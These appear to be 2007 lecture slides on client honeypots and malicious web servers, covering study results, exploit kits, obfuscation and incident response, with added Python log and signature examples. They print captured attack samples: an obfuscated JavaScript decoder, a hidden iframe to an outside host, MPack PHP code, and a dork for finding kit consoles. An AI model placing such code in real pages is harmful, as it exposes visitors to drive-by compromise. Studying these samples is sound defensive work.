Malicious Web Servers. Christian Seifert. IMT551, 31st October 2007. What are we dealing with? Honeypot.
Malicious Web Servers Christian Seifert IMT551 31st October 2007
What are we dealing with? Christian Seifert – IMT551
Honeypot
• “A honeypot is a security resource whose value lies in being probed, attacked, or compromised. Honeypots do not have a production value, which makes any activity to, on, and from the honeypot suspicious.” (Lance Spitzner, 2000)
• A honeypot can
  • Act as an intrusion detection sensor
  • Act as a decoy
  • Inform security researchers on attackers, their methodology and tools

Client Honeypots
• Security device that finds malicious servers on a network
[Diagram: the client honeypot sends a request to a benign server and to a malicious server. Response from the benign server: no state changes detected. Attack from the malicious server: new file appeared in start up folder.]

Client Honeypot Purpose
• Intrusion detection device (monitor your own servers)
• Defensive technology (blacklist identified malicious servers)
• Study aid of malicious servers

KYE Study I
• Identified malicious URLs with our client honeypot Capture-HPC
• Examined malicious URLs, their exploits and deployed malware
• Made recommendations to fend off (or at least reduce the risk of) the client-side attack threat
• Questions we intended to answer:
  • What is the risk?
  • Where are malicious servers located on the web?
  • Are there any areas at higher risk?
  • How effective is patching?
  • How effective is blacklisting?
  • Are all browsers targeted? If so, to what extent?

Capture-HPC
• Open-Source client honeypot (https://www.client-honeynet.org/capture.html)
• Ability to drive any HTTP aware client application
• Ability to monitor Windows Registry, file system, processes on the kernel level
• Collect modified files (malware)
• Collect network traffic

"file","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EXE","Write","C:\Documents and Settings\Administrator\tmpms45.exe"
"process","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EXE","created","C:\Documents and Settings\Administrator\tmpms45.exe"
"file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
"file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\services.exe","Write","C:\WINDOWS\system32\config\system"
"file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
"process","Oct 25, 2007 5:35:43 PM","C:\Documents and Settings\Administrator\tmpms45.exe","created","C:\Program Files\Outlook Express\wab.exe"

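An added example (not part of the original slides or of Capture-HPC itself): a Python pass over the log excerpt above that follows the chain from the monitored browser and reports executables that were written to disk and then started. The function names and the `CLIENT_NAMES` and `EXEC_EXT` lists are assumptions made for this illustration.

```python
import csv
import io
import ntpath

# Log excerpt from the Capture-HPC slide (console line wraps repaired).
SAMPLE_LOG = r'''"file","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EXE","Write","C:\Documents and Settings\Administrator\tmpms45.exe"
"process","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EXE","created","C:\Documents and Settings\Administrator\tmpms45.exe"
"file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
"file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\services.exe","Write","C:\WINDOWS\system32\config\system"
"file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
"process","Oct 25, 2007 5:35:43 PM","C:\Documents and Settings\Administrator\tmpms45.exe","created","C:\Program Files\Outlook Express\wab.exe"
'''

CLIENT_NAMES = {"iexplore.exe"}              # assumption: client driven by the honeypot
EXEC_EXT = (".exe", ".dll", ".scr", ".sys")  # assumption: extensions treated as executable


def parse_events(log_text):
    """Yield (kind, time, actor, action, target) from the five-column CSV log."""
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) == 5:  # skip blank or malformed lines
            kind, when, actor, action, target = row
            yield kind.lower(), when, actor, action.lower(), target


def analyze(log_text):
    """Return (dropped, spawned) as lists of (path, parent) tuples.

    dropped: executables written by a suspect process and then started by one.
    spawned: other processes started by a suspect process.
    """
    tainted, written = set(), set()
    dropped, spawned = [], []
    for kind, _when, actor, action, target in parse_events(log_text):
        suspect = (ntpath.basename(actor).lower() in CLIENT_NAMES
                   or actor.lower() in tainted)
        if not suspect:
            continue  # system noise such as svchost.exe is ignored here
        if kind == "file" and action == "write" and target.lower().endswith(EXEC_EXT):
            written.add(target.lower())
        elif kind == "process" and action == "created":
            (dropped if target.lower() in written else spawned).append((target, actor))
            tainted.add(target.lower())  # follow the chain into the child
    return dropped, spawned


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```
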
Input URLs
• 340,000 URLs inspected by standard WinXP IE6SP2 client honeypot
  • Specific content categories (adult, forums, music, news, hacker sites)
  • Previously defaced and vulnerable web servers
  • Advertisements
  • Typos (e.g. www.googel.com)
  • Spam
  • Known bad sites

Results: Where are malicious servers located on the web?
• 0.02 – 0.6 % likelihood of a URL being able to successfully attack a WinXP IE6SP2 installation
• Malicious web servers exist everywhere
• Spam links, hacker sites, adult sites are high risk areas on the web

Exploits Used / Malware Deployed
• Exploits are obfuscated
• Antivirus was unable to identify all malware
• Social engineering was used to avoid raising suspicion

<script language=JavaScript>
function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,21,4,60,32,52,45,13,28,0,0,0,0,0,0,5,42,57,37,41,48,62,59,56,24,46,31,38,12,3,27,19,1,39,36,6,26,44,20,9,33,34,0,0,0,0,43,0,15,53,40,8,2,54,16,7,0,14,23,18,11,22,58,35,51,50,29,25,47,10,30,55,49,61);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(250^w&255);w>>=8;s-=2}else{s=6}} document.write(r)}}dc('TaXRdJBCKAsZdLBysmDpjAdE2ksLdFdCKodbIjX52kBpjl7ZlAIxUxHSwocShxzrs_7SKjtRloHysu9xURcpNUBRhx8pPLHSIjDCPoH5i_7SPoDRKltEsPVy2aXRdJBCKlM')
</script>

<iframe src='http://crunet.biz/out.php' width='1' height='1' style='visibility: hidden;'></iframe>

"file","Write","C:\Program Files\Internet Explorer\IEXPLORE.EXE","C:\syswcon.exe"
"process","Created","C:\Program Files\Internet Explorer\IEXPLORE.EXE","C:\syswcon.exe"
"registry","SetValueKey","C:\syswcon.exe","HKCU\Software\ewrew\syswcon\main\cid"
...
"file","Write","C:\syswcon.exe","C:\WINDOWS\system32\drivers\uzcx.exe"
"process","Created","C:\syswcon.exe","C:\WINDOWS\system32\drivers\uzcx.exe"
"registry","SetValueKey", ...
...

Is Blacklisting a successful strategy?
• Blacklisting blocks specific IP addresses of hosts on the firewall or DNS server
• Stopbadware.org and mvps.org (hosts file) were used in DNS blackholing
• 306 malicious sites were once again inspected with our client honeypot
• Only 1 URL remained malicious

Is patching a successful strategy?
• All malicious URLs inspected with fully patched version of Internet Explorer 6
• Result: 0 successful compromises
• Unpatched vulnerabilities… still not safe…
  • VML vulnerability disclosed September 19, 2006; patch was available September 26, 2006
  • ANI vulnerability disclosed March 29, 2007; patch was available April 3, 2007

What browser is safer to use?
• Inspected approx. 30,000 adult content URLs
• Used older browsers as they are more vulnerable:
  • Microsoft Internet Explorer 6.0 SP 2 – Aug 2004
  • Mozilla Firefox 1.5.0 – Nov 2005
  • Opera 8.0.0 – Apr 2005
• Remote code execution vulnerabilities:

What browser is safer to use? Results
Study Summary
• Malicious web servers exist everywhere
• SPAM links, hacker sites are particularly risky; adult entertainment sites even more so
• Security vendors do know about malicious URLs, but do not know all malicious URLs
• Internet Explorer 6 SP2 is more targeted than Firefox or Opera.
• A fully patched Internet Explorer 6 was not successfully attacked
• Blacklisting reduced the risk significantly.

Recommendations
• Use client applications with non-administrative privileges
• Use personal firewalls that restrict outbound traffic
• Use non-mainstream browser with immediate patching mechanism (e.g. Firefox)
• Blacklist (Hosts file, bad sites (e.g. stopbadware.org))
• Patch…think about plug-ins and non-browser applications (Secunia Software Inspector)
• Investigate the URLs that users access with a client honeypot, such as Capture-HPC

KYE Study II
• Client honeypots are a black box approach
• Don’t know what is happening on the malicious web server.
• Questions remained unanswered:
  • How can we explain non-deterministic behavior?
  • Are browsers other than Internet Explorer targeted?
  • Are centralized exploit servers a common aspect?
  • Are there weaknesses in the obfuscation routine?

Web Exploitation Kits
• Easily host web based client-side exploits
• First appeared in early 2006
• WebAttacker, MPack, IcePack
• Costs between 15$ - 1000$
• Simple script-based web applications

Administrative Interface (Mpack)
IP Tracking
• Non-deterministic behavior
• Only launch attack once
• Purpose…unknown

//checks and saves user's IP hashed with browser
//to avoid future browser's hangup
function CheckAddUser() {
  global $UseMySQL;
  global $dbstats;
  $ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT"));
  if ($UseMySQL==0) {
    //text variant
    $fn="users.txt";
    if (file_exists($fn)) {
      $lines = file($fn);
      if (in_array($ipua."\n", $lines)==TRUE) {
        echo ";[";
        exit;
      }
    }
    ...

Targets? IcePack Targets:
• Microsoft Data Access Component Vulnerability (CVE-2006-0003)
• WebViewFolderIcon ActiveX Control Buffer Overflow Vulnerability (CVE-2006-3730)
• Microsoft Management Console Vulnerability (CVE-2006-3643)
• Vector Markup Language Vulnerability (CVE-2007-0024)
• Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX (CVE-2007-4336)
• Yahoo! Messenger Webcam ActiveX Remote Buffer Overflow Vulnerability (CVE-2007-3147, CVE-2007-3148)
• Yahoo! Widgets YDP ActiveX Control Buffer Overflow Vulnerability (CVE-2007-4034)
• Windows Media Player Plug-In with Non-Microsoft Internet Explorer Vulnerability (CVE-2006-0005)
• JavaScript Navigator Object Vulnerability (CVE-2006-3677)

Exploit Servers
• Administrative interface provides information

Exploit Servers
• High value information
• Easily identifiable
  • Via crawlers & IDS signatures:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Access to MPack v0.94 web exploitation kit administrative console"; flow:from_server,established; uricontent:"/admin.php"; content:"All activity is being monitored"; reference:url, http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/2005/2011/MPack.pdf; classtype:bad-unknown; sid:TBD; rev:1;)

  • Or search engine queries:
    • inurl:"admin.php" "All activity is being monitored"

Obfuscation
• Obfuscation is the mechanism to hide attacks from signature based approaches by modifying the appearance of the malicious content
• How effective is it?
• Web exploitation kits were using little randomization.
[Diagram: “malicious content” is turned into one of the variants 001 - “dsasdhajkh”, 002 - “fdshfjqeqqeq”, … 255 - “ffdsfdsasaq”]

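An added example, not from the original slides or from any kit: why little randomization helps signature matching. It assumes, purely for illustration, that each variant is a single-byte XOR of the same content (the slides do not show the kits' actual routine); the sample page, the signature and all function names are constructed for this sketch.

```python
# Assumption for illustration: variant N of the content is "content XOR N"
# with a one-byte key. The slides do not show the kits' real routine.
SIGNATURE = b"<iframe src="  # constructed plaintext signature


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte of data."""
    return bytes(b ^ key for b in data)


def expand_signature(sig: bytes) -> dict:
    """Turn one plaintext signature into every form it can take on the wire."""
    return {key: xor_bytes(sig, key) for key in range(256)}  # key 0 = plain


def match_obfuscated(blob: bytes, sig: bytes = SIGNATURE) -> list:
    """Return [(key, offset)] for each variant of sig found in blob."""
    hits = []
    for key, variant in expand_signature(sig).items():
        offset = blob.find(variant)
        if offset != -1:
            hits.append((key, offset))
    return hits


def deobfuscate(blob: bytes, sig: bytes = SIGNATURE):
    """Recover the content when exactly one key explains the blob."""
    hits = match_obfuscated(blob, sig)
    if len(hits) != 1:
        return None  # no match, or ambiguous: leave for manual review
    return xor_bytes(blob, hits[0][0])


# Constructed sample: a harmless page body served under two different keys.
PAGE = b'<html><iframe src="http://example.invalid/" width="1"></iframe></html>'
SAMPLE_A = xor_bytes(PAGE, 0x5A)
SAMPLE_B = xor_bytes(PAGE, 0xC3)

if __name__ == "__main__":
    for name, blob in (("A", SAMPLE_A), ("B", SAMPLE_B)):
        print(name, match_obfuscated(blob), deobfuscate(blob) == PAGE)
```

With so small a keyspace, one plaintext signature expands into a fixed set of byte patterns that covers every variant the server can emit.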
Summary
• Access to web exploitation kits gives us insights into malicious web servers that client honeypots cannot provide
• Web exploitation kits are a threat, but also a blessing (homogenizing effect)
• Implications on client honeypot technology
  • Stock Windows XP SP2 installation insufficient. Third-party apps need to be considered
  • Distributed architecture will be required

Incident Response
• Assume you discover an attack by a malicious web server. The attack has caused great damage and you would like to track down and prosecute the person responsible.
• How would you go about it?
• What data would you collect?

Food For Thought: Address Resolution Protocol (ARP)
[Diagram steps:]
1. Http Request to Web Server at IP 192.168.77.250
2. Who has IP 192.168.77.250?
3. I have that IP!
4. Http Request to 192.168.77.250
5. Http Response
6. Http Response

Food For Thought: ARP
[Diagram steps:]
1. Http Request to Web Server at IP 192.168.77.250
2. Who has IP 192.168.77.250?
3. I have that IP!
4. I have that IP!
5. Http Request to 192.168.77.250
6. Http Request
7. Http Response
8. Malicious Http Response
9. Malicious Http Response

Food For Thought: Domain Name Resolution
• Translate host names (e.g. www.google.com) to IP addresses (72.14.253.99)
[Diagram: "Where is www.google.com?" / "www.google.com is at 72.14.253.99"]

Food For Thought: Fast Flux Networks
[Diagram: "Where is www.badsite.com?" / "www.badsite.com is at 130.14.253.99"; "Where is www.badsite.com?" / "www.badsite.com is at 130.195.38.22"]

Food For Thought: Fast Flux Networks
[Diagram labels: 1, 2, 3; "Where is www.badsite.com?"; "Try this one" (twice); "www.badsite.com is at 130.182.12.11" (twice)]

Conclusion
• Incident response not so easy
• Expect the unexpected
• Perform an analysis/practice before an incident occurs

Questions?
http://www.honeynet.org/papers/mws
https://www.client-honeynet.org
http://en.wikipedia.org/wiki/Client_honeypot_/_honeyclient